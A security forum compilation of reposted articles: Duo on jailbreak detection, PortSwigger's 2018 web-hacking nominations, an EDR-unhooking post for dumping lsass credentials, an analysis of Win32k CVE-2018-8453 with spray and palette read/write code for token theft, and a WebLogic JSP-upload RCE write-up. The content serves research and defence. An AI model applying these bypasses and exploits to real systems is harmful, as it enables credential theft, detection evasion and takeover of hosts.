Approaches like this must be considered in the context of a threat model. It is impossible to guarantee that you will be able to detect a tampered device, for the simple reason that you are restricted to running in userspace, whereas anti-jailbreak-detection utilities can run in a privileged context. With that said, the goal is not perfect security, but rather sufficient security such that the average end user of a jailbroken device—who is not a determined attacker—will not be able to evade detection.

Ultimately, the security of your application cannot rely on hiding the way it works. Proper server-side validation of client-submitted data, use of well-known cryptographic protocols, and use of hardware-backed cryptographic functionality available in many newer devices all go a long way toward strengthening the security posture of your application without relying on obscurity.

Sursa: https://duo.com/blog/jailbreak-detector-detector
21. Top 10 web hacking techniques of 2018 - nominations open

James Kettle | 03 January 2019 at 14:43 UTC

Nominations are now open for the top 10 new web hacking techniques of 2018. Every year countless security researchers share their findings with the community. Whether they're elegant attack refinements, empirical studies, or entirely new techniques, many of them contain innovative ideas capable of inspiring new discoveries long after publication. And while some inevitably end up on stage at security conferences, others are easily overlooked amid a sea of overhyped disclosures, and doomed to fade into obscurity.

As such, each year we call upon the community to help us seek out, distil, and preserve the very best new research for future readers. As with last year, we'll do this in three phases:

- Jan 1st: Start to collect community nominations
- Jan 21st: Launch community vote to build shortlist of top 15
- Feb 11th: Panel vote on shortlist to select final top 10

Last year we decided to prevent conflicts of interest by excluding PortSwigger research, but found the diverse voting panel meant we needed a better system. We eventually settled on disallowing panelists from voting on research they're affiliated with, and adjusting the final scores to compensate. This approach proved fair and effective, so having checked with the community we'll no longer exclude our own research.

To nominate a piece of research, either use this form or reply to this Twitter thread. Feel free to make multiple nominations, nominate your own research, etc. It doesn't matter whether the submission is a blog post, whitepaper, or presentation recording - just try to submit the best format available. If you want, you can take a look at past years' top 10 to get an idea of what people feel constitutes great research. You can find previous years' results here: 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016/17.

Nominations so far

Here are the nominations so far. We're making offline archives of them all as we go, so we can replace any that go missing in future. I'll do a basic quality filter before the community vote starts.

- How I exploited ACME TLS-SNI-01 issuing Let's Encrypt SSL-certs for any domain using shared hosting
- Kicking the Rims - A Guide for Securely Writing and Auditing Chrome Extensions | The Hacker Blog
- EdOverflow | An analysis of logic flaws in web-of-trust services.
- OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
- PowerPoint Presentation - OWASP_AppSec_EU18_WordPress.pdf
- Scratching the surface of host headers in Safari
- RCE by uploading a web.config – 003Random's Blog
- Security: HTTP Smuggling, Apsis Pound load balancer | RBleug
- Piercing the Veil: Server Side Request Forgery to NIPRNet access
- inputzero: A bug that affects million users - Kaspersky VPN | Dhiraj Mishra
- inputzero: Telegram anonymity fails in desktop - CVE-2018-17780 | Dhiraj Mishra
- inputzero: An untold story of skype by microsoft | Dhiraj Mishra
- Neatly bypassing CSP – Wallarm
- Large-Scale Analysis of Style Injection by Relative Path Overwrite - www2018rpo_paper.pdf
- Beyond XSS: Edge Side Include Injection :: GoSecure
- GitHub - HoLyVieR/prototype-pollution-nsec18: Content released at NorthSec 2018 for my talk on prototype pollution
- Logically Bypassing Browser Security Boundaries - Speaker Deck
- Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out
- Web Cache Deception Attack - YouTube
- Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | Duo Security
- #307670 Difference in query string parameter processing between Hacker News and Keybase Chrome extension spawns chat to incorrect user
- lanmaster53.com
- Beyond XSS: Edge Side Include Injection :: GoSecure
- Scratching the surface of host headers in Safari
- #309531 Stored XSS in Snapmatic + R★Editor comments
- InsertScript: Adobe Reader PDF - Client Side Request Injection
- $36k Google App Engine RCE - Ezequiel Pereira
- MKSB(en): CVE-2018-5175: Universal CSP strict-dynamic bypass in Firefox
- #341876 SSRF in Exchange leads to ROOT access in all instances
- reCAPTCHA bypass via HTTP Parameter Pollution – Andres Riancho
- Data Exfiltration via Formula Injection #Part1
- Read&Write Chrome Extension Same Origin Policy (SOP) Bypass Vulnerability | The Hacker Blog
- Firefox uXSS and CSS XSS - Abdulrahman Al-Qabandi
- Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution - Bishop Fox
- Bypassing Web-Application Firewalls by abusing SSL/TLS | 0x09AL Security blog
- Evading CSP with DOM-based dangling markup | Blog
- Save Your Cloud: DoS on VMs in OpenNebula 4.6.1
- CRLF Injection Into PHP's cURL Options – TomNomNom – Medium
- Practical Web Cache Poisoning | Blog
- #317476 Account Takeover in Periscope TV
- A timing attack with CSS selectors and Javascript
- VPN Extensions are not for privacy
- Exposing Intranets with reliable Browser-based Port scanning | Blog
- Exploiting XXE with local DTD files
- A story of the passive aggressive sysadmin of AEM - Speaker Deck
- Hunting for security bugs in AEM webapps - Speaker Deck
- ASP.NET resource files (.RESX) and deserialisation issues
- Story of my two (but actually three) RCEs in SharePoint in 2018 | Soroush Dalili (@irsdl) – سروش دلیلی
- Beware of Deserialisation in .NET Methods and Classes + Code Execution via Paste!
- cat ~/footstep.ninja/blog.txt
- Blog - RCE due to ShowExceptions
- MB blog: Vulnerability in Hangouts Chat: from open redirect to code execution
- Blog on Gopherus Tool
- DNS Rebinding Headless Browsers
- It's A PHP Unserialization Vulnerability Jim But Not As We Know It

James Kettle
@albinowax

Sursa: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018-nominations-open
22. Bypass EDR's memory protection, introduction to hooking

Hoang Bui | Jan 18

Introduction

On a recent internal penetration engagement, I was up against an EDR product that I will not name. This product greatly hindered my ability to access lsass' memory and use our own custom flavor of Mimikatz to dump clear-text credentials.

[Image: For those who recommend ProcDump]

The Wrong Path

So now, as an ex-malware author — I know that there are a few things you could do as a driver to accomplish this detection and block. The first thing that came to my mind was ObRegisterCallbacks, which is commonly used by many antivirus products. Microsoft implemented this callback because many antivirus products were performing very sketchy WinAPI hooks that resemble malware rootkits. However, at the bottom of the MSDN page, you will notice a line saying "Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008." To give some missing context, I am on Windows Server 2003 at the moment. Therefore, it is missing the necessary function to perform this block.

After spending hours and hours doing black-magic stuff with csrss.exe and attempting to inherit a handle to lsass.exe through csrss.exe, I was successful in gaining a handle with PROCESS_ALL_ACCESS to lsass.exe. This was done by abusing csrss to spawn a child process, which then inherited the already existing handle to lsass.

[Image: There is no EDR solution on this machine; this was just a PoC]

However, after thinking "I got this!" and getting ready to rejoice in victory over defeating a certain EDR, I was met with a disappointing conclusion. The EDR blocked the shellcode injection into csrss as well as the thread creation through RtlCreateUserThread. Yet for some reason, the code — while failing to spawn as a child process and inherit the handle — was still somehow able to get the PROCESS_ALL_ACCESS handle to lsass.exe. WHAT?!

Hold up, let me try just opening a handle to lsass.exe without any fancy stuff, with just this line:

HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsasspid);

And what do you know, I got a handle with FULL CONTROL over lsass.exe. The EDR did not make a single fuss about this. This is when I realized I had started off with the wrong approach: the EDR never really cared about you gaining handle access. It is what you do afterward with that handle that will come under scrutiny.

Back on Track

Knowing there was no fancy trick to getting a full-control handle to lsass.exe, we can now move forward to find the next point of the issue. Immediately calling MiniDumpWriteDump() with the handle failed spectacularly.

Let's dissect this warning further. "Violation: LsassRead". I didn't read anything, what are you talking about? I just want to make a dump of the process. However, I also know that to make a dump of a remote process, some sort of WinAPI must be called inside MiniDumpWriteDump(), such as ReadProcessMemory (RPM). Let's look at MiniDumpWriteDump's source code in ReactOS.

[Image: Multiple calls to RPM]

As you can see, the function (2) dump_exception_info(), as well as many other functions, relies on (3) RPM to perform its duty. These functions are referenced by (1) MiniDumpWriteDump, and this is probably the root of our issue.

Now here is where a bit of experience comes into play. You must understand Windows system internals and how WinAPIs are processed. Using ReadProcessMemory as an example — it works like this. ReadProcessMemory is just a wrapper. It does a bunch of sanity checks, such as nullptr checks.
That is all RPM does. However, RPM also calls a function named NtReadVirtualMemory, which sets up the registers before executing a syscall instruction. The syscall instruction simply tells the CPU to enter kernel mode, where another function, ALSO named NtReadVirtualMemory, is called — and that one performs the actual logic of what ReadProcessMemory is supposed to do.

-------------------- Userland -------------------- | ----- Kernel Land -----
RPM  -->  NtReadVirtualMemory  -->  SYSCALL  -->  NtReadVirtualMemory
(kernel32)       (ntdll)                              (ntoskrnl)

With that knowledge, we now must identify HOW the EDR product is detecting and stopping the RPM/NtReadVirtualMemory call. The answer is simple: "hooking". Please refer to my previous post regarding hooking here for more information. In short, hooking gives you the ability to put your code in the middle of any function and gain access to the arguments as well as the return value. I am 100% sure that the EDR is using some sort of hook through one or more of the various techniques that I mentioned.

However, readers should know that most if not all EDR products use a service, specifically a driver running inside kernel mode. With access to kernel mode, the driver could perform the hook at ANY level of RPM's call stack. However, it would open up a huge security hole in a Windows environment if it were trivial for any driver to hook ANY level of a function. Therefore, a solution was put forward to prevent modifications of this nature, known as Kernel Patch Protection (KPP or PatchGuard). KPP scans the kernel at almost every level and will trigger a BSOD if a modification is detected. This includes the ntoskrnl portion, which houses the kernel-level logic of the WinAPIs. With this knowledge, we are assured that the EDR would not and did not hook any kernel-level function inside that portion of the call stack, leaving us with the userland RPM and NtReadVirtualMemory calls.

The Hook

To see where a function is located inside our application's memory, it is as trivial as a printf with the %p format string and the function name as the argument, as below. However, unlike RPM, NtReadVirtualMemory is not declared in the usual Windows headers, so you cannot just reference the function like normal: you must declare its signature yourself and link ntdll.lib into your project (the function is, however, present in ntdll's export table, so it can also be resolved at run time with GetProcAddress). With everything in place, let's run it and take a look!

Now, this provides us with the addresses of both RPM and NtReadVirtualMemory. I will now use my favorite reversing tool to read the memory and analyze its structure: Cheat Engine.

[Image: ReadProcessMemory]
[Image: NtReadVirtualMemory]

For the RPM function, everything looks fine. It does some stack and register setup and then calls ReadProcessMemory inside KernelBase (a topic for another time), which eventually leads you down into ntdll's NtReadVirtualMemory. However, if you look at NtReadVirtualMemory and know what the most basic detour hook looks like, you can tell that this is not normal. The first 5 bytes of the function are modified while the rest are left as-is. You can tell this by looking at other similar functions around it. All the other functions follow a very similar format:

0x4C, 0x8B, 0xD1,             // mov r10, rcx ; NtReadVirtualMemory
0xB8, 0x3C, 0x00, 0x00, 0x00, // mov eax, 3Ch — aka the syscall id
0x0F, 0x05,                   // syscall
0xC3                          // retn

The one difference between them is the syscall id (which identifies the WinAPI function to be invoked once inside kernel land).
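As a quick aid (my own sketch, not part of the original post), here is how those first bytes can be dumped at run time to flag a detour; the 0x3C syscall id matches the listing above but varies between Windows builds:

#include <stdio.h>
#include <windows.h>

int main(void)
{
    /* NtReadVirtualMemory lives in ntdll's export table, so we can
     * resolve it at run time even without a header declaration. */
    unsigned char *p = (unsigned char *)GetProcAddress(
        GetModuleHandleA("ntdll.dll"), "NtReadVirtualMemory");
    if (!p) return 1;

    printf("NtReadVirtualMemory @ %p:", (void *)p);
    for (int i = 0; i < 11; i++) printf(" %02X", p[i]);
    printf("\n");

    if (p[0] == 0xE9)                                      /* jmp rel32 */
        puts("first instruction is a JMP -- likely detoured");
    else if (p[0] == 0x4C && p[1] == 0x8B && p[2] == 0xD1) /* mov r10, rcx */
        puts("stub starts with mov r10, rcx -- looks clean");
    return 0;
}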
However, for NtReadVirtualMemory, the first instruction is actually a JMP instruction to an address somewhere else in memory. Let's follow that.

[Image: CyMemDef64.dll]

Okay, so we are no longer inside ntdll's module, but instead inside CyMemDef64.dll's module. Ahhhhh, now I get it. The EDR placed a jump instruction where the original NtReadVirtualMemory function is supposed to be, redirecting the code flow into their own module, which then checks for any sort of malicious activity. If the checks fail, the Nt* function returns with an error code, never entering kernel land to begin with.

The Bypass

It is now very self-evident what the EDR is doing to detect and stop our WinAPI calls. But how do we get around that? There are two solutions.

Re-Patch the Patch

We know what the NtReadVirtualMemory function SHOULD look like, and we can easily overwrite the jmp instruction with the correct instructions. This will stop our calls from being intercepted by CyMemDef64.dll and let them enter the kernel, where the EDR has no control.

Ntdll IAT Hook

We could also create our own function, similar to what we do in Re-Patch the Patch, but instead of overwriting the hooked function, we recreate it elsewhere. Then we walk ntdll's Import Address Table, swap out the pointer for NtReadVirtualMemory, and point it to our new fixed_NtReadVirtualMemory. The advantage of this method is that if the EDR decides to check on its hook, the hook will look unmodified. It just is never called, because the ntdll IAT points elsewhere.

The Result

I went with the first approach. It is simple, and it allows me to get the blog out quicker :). However, it would be trivial to do the second method, and I have plans on doing just that within a few days.

Introducing AndrewSpecial, for my manager Andrew, who is currently battling a busted appendix in the hospital right now. Get well soon, man.

[Image: AndrewSpecial.exe was never caught :P]

Conclusion

This currently works for this particular EDR; however, it would be trivial to reverse similar EDR products and create a universal bypass, due to the limitations around what they can and cannot hook (thank you, KPP). Did I also mention that this works on both 64-bit (on all versions of Windows) and 32-bit (untested)? And the source code is available HERE.

Thank you again for your time, and please let me know if I made any mistakes.

Sursa: https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
23. CVE-2018-8453: Win32k Elevation of Privilege Vulnerability Targeting the Middle East

2019-01-19 | By 360 Threat Intelligence Center | Technical Research

Background

On October 10, 2018, Kaspersky disclosed a Win32k elevation-of-privilege exploit (CVE-2018-8453) captured in August. This vulnerability was used as a 0-day in attacks targeting the Middle East to escalate privileges on compromised Windows systems. It is related to window management and graphics device interfaces (win32kfull.sys) and can be used to elevate user privileges to SYSTEM. It can also be used to escape sandbox protection in PDF readers, Office, and IE, which makes the exploit extremely valuable.

360 Threat Intelligence Center performed a deep analysis of this vulnerability and came up with a PoC exploit that works on some of the affected Windows systems (both x86 and x64 versions of Windows 10).

Analysis Environment

The work was performed on Windows 10 x64 Version 1709, with patches predating the CVE-2018-8453 fix:

Root Cause

This vulnerability is caused by a fault in the win32kfull!NtUserSetWindowFNID function, which fails to check whether the window object has been released before setting the FNID. This allows a new FNID to be set on a window that has already been released (FNID_FREED: 0x8000). By exploiting this defect, we can control the fnDWORD callback invoked from xxxFreeWindow when the window object gets destroyed, and thereby cause a use-after-free of pSBTrack in win32kfull!xxxSBTrackInit.

About FNID: by examining the leaked Windows 2000 source code and the related documentation in ReactOS, we figured out that the FNID records what kind of window this is, such as a button or an edit box. It can also record the state of the window; for example, FNID_FREED (0x8000) means the window has been released.

POC – How to Trigger the Vulnerability

The vulnerability can be triggered by the following steps:

Step 1: Hook two callbacks in the KernelCallbackTable.

Step 2: Create the main window and the scroll bar.

Step 3: Send a WM_LBUTTONDOWN message to the scroll bar to trigger the call to the xxxSBTrackInit function.

Hint: when you left-click a scroll bar, it triggers a call to win32kfull!xxxSBTrackInit. After that, xxxSBTrackLoop is called to capture mouse events in a loop, until the left mouse button is released or certain other messages are received.

Step 4: Call DestroyWindow(g_hMAINWND) in the callback function fnDWORD_hook when it gets executed by xxxSBTrackLoop. This results in a call to win32kfull!xxxFreeWindow. Because cbWndExtra was not 0 when the main window class was registered, win32kfull!xxxFreeWindow calls the xxxClientFreeWindowClassExtraBytes function to release the extra data belonging to the main window.

The function in the above picture executes the KernelCallbackTable[126] callback, which results in our second hook being called.

Step 5: After entering our second hook function (fnClientFreeWindowClassExtraBytesCallBack_hook), we must manually call NtUserSetWindowFNID(g_hMAINWND, spec_fnid) to set the FNID of the main window (a value from 0x2A1 to 0x2AA; here we set spec_fnid to 0x2A2). Meanwhile, create a new scroll bar (g_hSBWNDNew) and call SetCapture(g_hSBWNDNew) to make g_hSBWNDNew the window that captures mouse events in the current thread.

Step 6: Since the main window is destroyed, xxxSBTrackLoop will return and continue on to execute HMAssignmentUnlock(&pSBTrack->spwndNotify), performing the related dereference that makes the main window get released completely.
This will cause xxxFreeWindow to be called again:

From the above picture, we know that once xxxFreeWindow is called, the window's FNID is marked with 0x8000. Since the FNID of the main window was set to 0x2A2 in Step 5, LOWORD(FNID) is now 0x82A2 (the DestroyWindow call in Step 4 made xxxFreeWindow mark the main window with 0x8000). So SfnDWORD will be executed, and control then enters our hook through the fnDWORD callback.

When we get into the fnDWORD_hook function again, it is our last chance to come back to R3. At this point, if SendMessage(g_hSBWNDNew, WM_CANCELMODE) is called, xxxEndScroll (see the Win2k code shown below) will be executed to release pSBTrack.

Because the POC program is single-threaded, all windows created by the thread point to the same thread information structure. Even if the scroll bar window that SBTrack belongs to has been released, as long as the new window is created by the same thread, pSBTrack still points to the same structure. The condition qp->spwndCapture == pwnd is satisfied because we are sending the WM_CANCELMODE message to the newly created scroll bar g_hSBWNDNew, and we previously called SetCapture(g_hSBWNDNew) to make the current thread capture mouse events in the g_hSBWNDNew window.

Finally, UserFreePool(pSBTrack) gets executed to release pSBTrack, which frees pSBTrack before HMAssignmentUnlock(&pSBTrack->spwndSB) executes and results in a use-after-free of pSBTrack.

Exploit on Windows 10 x64

Since, by hooking callbacks in the KernelCallbackTable, we can make the pSBTrack in win32kfull!xxxSBTrackInit get released early to create a use-after-free, pool feng shui can be used to reclaim the prematurely freed pSBTrack and achieve an arbitrary memory decrement in a loop. Combined with a desktop heap memory leak [2] and GDI palette abuse, this yields arbitrary memory read/write, and finally privilege escalation!

Implementation of the Arbitrary Memory Decrement

From the above analysis, we know that the memory pointed to by pSBTrack has been released after the call to HMAssignmentUnlock(&pSBTrack->spwndSBNotify). Continue to the next HMAssignmentUnlock(&pSBTrack->spwndSB), then take a look at the disassembly of HMAssignmentUnlock, and you will find a very interesting place:

Executing lock xadd dword ptr [rdx+8], eax decrements the DWORD pointed to by rdx+8. After debugging the code, we figured out that pSBTrack->spwndSB is assigned to rdx! So, if we can control the value of pSBTrack->spwndSB, we can decrement any DWORD in memory by one.

pSBTrack is released after we call SendMessage(g_hSBWNDNew, WM_CANCELMODE). So if we immediately allocate an object (such as a Bitmap) of the same size as SBTrack, and we control the data of that object, there is a high probability that the freed pool chunk will be reassigned to the object.

Test results:

Similarly, when HMAssignmentUnlock(&pSBTrack->spwndSBTrack) is executed, there is another arbitrary decrement, this time on the DWORD pointed to by pSBTrack->spwndSBTrack+8. So, by controlling the data in the Bitmap sprayed into the space previously used by pSBTrack, we can decrement an arbitrary memory value by one or two per trigger. A single decrement only requires either pSBTrack->spwndSB or pSBTrack->spwndSBTrack to be 0, and the other one to be the target address minus sizeof(PVOID).
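A sketch of this reclaim step follows. It is heavily hypothetical: the size and field offsets of the SBTrack structure below (TRACK_SIZE, OFF_SPWNDSB, OFF_SPWNDSBTRACK) are placeholder values that would have to be recovered for the exact build, and pool reuse is probabilistic, so a real exploit would spray many bitmaps:

#include <windows.h>
#include <string.h>

/* Placeholder layout constants -- NOT from the original article. */
#define TRACK_SIZE       0x68
#define OFF_SPWNDSB      0x10
#define OFF_SPWNDSBTRACK 0x18

/* Spray a Bitmap whose bit data overlays the freed SBTrack: spwndSB
 * aims the decrement at (target - 8), because the lock xadd hits
 * [spwndSB + 8]; spwndSBTrack stays 0 so only one decrement fires. */
HBITMAP spray_fake_sbtrack(ULONG64 target)
{
    BYTE fake[TRACK_SIZE] = {0};
    ULONG64 aim = target - sizeof(PVOID);
    memcpy(fake + OFF_SPWNDSB, &aim, sizeof(aim));

    /* 8bpp, TRACK_SIZE x 1 bitmap -> TRACK_SIZE bytes of bit data. */
    HBITMAP hbm = CreateBitmap(TRACK_SIZE, 1, 1, 8, NULL);
    if (hbm)
        SetBitmapBits(hbm, TRACK_SIZE, fake);
    return hbm;
}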
As long as we repeatedly trigger this process, we can decrement the memory value by one or two as many times as needed in order to change it to a specified number:

result = target - repeat_count
result = target - repeat_count * 2

Obviously, we have to know the original value first in order to reduce it to the value we want, so there are some limitations compared with setting a value directly.

Hint: if we need to change 0x02000000 to 0x00000000, do we need to repeat the minus-two operation 0x01000000 times? The answer is no. Because we can decrement the DWORD at an arbitrary address, the target address can be shifted so that the 0x02 becomes the low byte of the DWORD being decremented. The problem then becomes changing 0x00000002 to 0x00000000, which needs just one pass, so there is no need to worry about loop-count limitations.

Use the GDI Palette to Achieve Arbitrary R/W

Below is the documented PALETTE data structure:

typedef struct _PALETTE64
{
    BASEOBJECT64 BaseObject;
    ...
    ULONG64 pRGBXlate;
    PALETTEENTRY *pFirstColor;
    struct _PALETTE *ppalThis;
    PALETTEENTRY apalColors[3];
} PALETTE64;

The member apalColors is an array. Each member of the array is 4 bytes in size, and its content can be specified by the user. pFirstColor, similar to a Bitmap's pvScan0 pointer, points to that array and can be used to construct the R/W primitive. The following relationship holds, and from it we know the initial value of the memory pointed to by pFirstColor:

Address of PALETTEENTRY = Address of pFirstColor + sizeof(PVOID) * 2

Just as a Bitmap manipulates the data in its pixel area through GetBitmapBits and SetBitmapBits, a PALETTE uses GetPaletteEntries and SetPaletteEntries to manipulate the data pointed to by pFirstColor. So we construct two palettes, named hManager and hWorker respectively:

If we can learn the values of hManager's pFirstColor and hWorker's pFirstColor, we can use the arbitrary memory decrement described above to walk hManager->pFirstColor down onto hWorker's pFirstColor field. After that, we can use hManager with SetPaletteEntries to control hWorker->pFirstColor, then use hWorker with SetPaletteEntries and GetPaletteEntries to achieve arbitrary memory read/write.

Fortunately, we can use the following techniques to stabilize the values of hManager's pFirstColor and hWorker's pFirstColor, and to ensure that hManager's pFirstColor value is not much larger than hWorker's pFirstColor, keeping the decrement loop short.

Use the Desktop Heap to Leak the GDI Palette Address

Since a window's menu name can be quite long, lpszMenuName and the Palette are allocated from the same memory pool. Because we can get the kernel address of lpszMenuName through the tagWND pointer returned by HMValidateHandle, we can use the desktop heap [2] to help us predict the kernel address of the pFirstColor pointer. With proper construction, the accuracy rate can reach 100%.

First, we repeatedly create and delete a window object to allocate and release the same pool chunk. Once the address stops changing, the next Palette object we construct with a size equal to lpszMenuName will be allocated at the address of the lpszMenuName that has just been released:

Then we can get the kernel address of pFirstColor by using its offset inside _PALETTE64. hManager->pFirstColor can then be walked down to point at hWorker's pFirstColor using the decrement operation above, in order to achieve arbitrary memory read/write.
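Assuming hManager->pFirstColor has already been walked down onto hWorker's pFirstColor field by the decrement primitive, the resulting helpers are short. This is a generic sketch of the well-known palette technique, not code from the article; since each PALETTEENTRY is 4 bytes, two entries carry one 64-bit value:

#include <windows.h>

/* Created earlier with CreatePalette(); after the decrement loop,
 * hManager's pFirstColor points at hWorker's pFirstColor field. */
static HPALETTE g_hManager, g_hWorker;

static ULONG64 read64(ULONG64 addr)
{
    ULONG64 value = 0;
    /* Aim hWorker at the target address, then read through it. */
    SetPaletteEntries(g_hManager, 0, 2, (const PALETTEENTRY *)&addr);
    GetPaletteEntries(g_hWorker, 0, 2, (PALETTEENTRY *)&value);
    return value;
}

static void write64(ULONG64 addr, ULONG64 value)
{
    /* Aim hWorker at the target address, then write through it. */
    SetPaletteEntries(g_hManager, 0, 2, (const PALETTEENTRY *)&addr);
    SetPaletteEntries(g_hWorker, 0, 2, (const PALETTEENTRY *)&value);
}

With these two helpers in hand, the token copy described next reduces to a handful of read64/write64 calls.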
Privilege Escalation by Arbitrary Memory R/W

Since arbitrary memory read/write is now available, we can walk the EPROCESS list to get the Token value of the System process as well as the Token address of the current process. Then we can escalate privileges by copying the Token value from the System process over the current process's Token.

How do we get the System EPROCESS from user mode? By looking up PsInitialSystemProcess [3] in ntoskrnl.exe:

Code to get the _EPROCESS of the current process:

Use arbitrary memory read/write to copy the Token:

Exploit Process in Summary

360 Threat Intelligence Center summarized the entire process as follows:

1. Get the pFirstColor values of hManager and hWorker using the desktop heap leak technique.
2. Trigger the vulnerability multiple times to change hManager->pFirstColor so that it points at hWorker's pFirstColor.
3. Perform privilege escalation via arbitrary memory read/write.
4. Use arbitrary memory read/write to trick the operating system into not cleaning up the Bitmap object. Without this step, the system would free the Bitmap object again when the program exits, causing a double free and a blue screen.

Screenshot:

Patch Analysis

Using BinDiff, we find that in the patched version of win32kfull!NtUserSetWindowFNID, IsWindowBeingDestroyed is called to check whether the window has been released before a new FNID is set. The function returns immediately if the window object has been released and does not allow a new FNID value to be set. So when we call DestroyWindow, the subsequent NtUserSetWindowFNID call fails to set the FNID. This fixes the vulnerability, since it prevents us from releasing pSBTrack in advance.

Conclusion

After this investigation, we came up with a PoC exploit for Windows 10 Pro v1709 x86/x64 that performs privilege escalation successfully when the system is not patched. For other Windows versions, only the offsets of the corresponding data structures need to be changed, such as the offset of Token inside _EPROCESS.

References

[1] https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/
[2] https://blogs.msdn.microsoft.com/ntdebugging/2007/01/04/desktop-heap-overview/
[3] https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/mm64bitphysicaladdress
[4] https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig
[5] https://www.anquanke.com/post/id/168572#h2-1
[6] https://www.anquanke.com/post/id/168441#h2-0
[7] ed2k://|file|cn_windows_10_multi-edition_vl_version_1709_updated_sept_2017_x64_dvd_100090774.iso|4630972416|8867C5E54405FF9452225B66EFEE690A|/

Sursa: https://ti.360.net/blog/articles/cve-2018-8453-win32k-elevation-of-privilege-vulnerability-targeting-the-middle-east-en/
24. [Video] Proof of Concept: CVE-2018-2894 Oracle WebLogic RCE

Kristian Bremberg / November 14, 2018

A recent vulnerability affecting Oracle WebLogic Server was sent in to Crowdsource. The vulnerability is an unauthenticated remote code execution (RCE) that is easily exploited. In this article we will go through the technical aspects of the Oracle WebLogic RCE vulnerability and its exploitation.

Proof of concept video:

How the exploit works:

The vulnerability affects the Web Services (WLS) subcomponent. The path /ws_utc/config.do (on port 7001) is reachable without any authentication by default; however, this page is only available in development mode.

In order to make this vulnerability exploitable, the attacker needs to set a new Work Home Dir, which has to be writable. The path servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css works for this. After the new writable Work Home Dir is set, it is possible to upload a JSP file in the Security tab.

[Image: The interface where it is possible to save a Work Home Dir, which will be the path where JKS keystores are saved.]

The page lets an attacker upload "JKS keystores" that are actually JavaServer Pages (JSP) files. These uploaded files can then be accessed and executed. The file upload is done as multipart/form-data to the path /ws_utc/resources/setting/keystore. The server then responds with XML containing the keyStoreItem ID, which is used to reach the uploaded file at a path of the form /ws_utc/css/config/keystore/1582617386107_filename.jsp.

[Image: After a successful upload of a JKS keystore, the response contains its ID.]

Impact:

If a hacker acts upon this vulnerability, they may be able to completely compromise the server. However, because the test page only exists in development mode, it is very important to check that your WebLogic server is not running in development mode. In some cases, port 7001 is filtered and therefore not reachable from the Internet.

For an attacker it is very easy to detect this vulnerability. WebLogic is easily fingerprinted (via its Server header), and a quick search on Shodan shows that there are many instances open on the Internet.

Additional information:

For the full security advisory about the Oracle WebLogic RCE, read more in the Oracle Critical Patch Update Advisory. Log into your Detectify account to find out if your applications are vulnerable and get remediation tips. Questions or comments? Let us know in the section below.

Begin a scan for the latest vulnerabilities today. Start a free trial with Detectify here! Detectify is a continuous web scanning service that can be set up for automated scanning for 1000+ known vulnerabilities, including the OWASP Top 10. Check for the latest vulnerabilities!

Written by Kristian Bremberg
Edited by Jocelyn Chan

Sursa: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/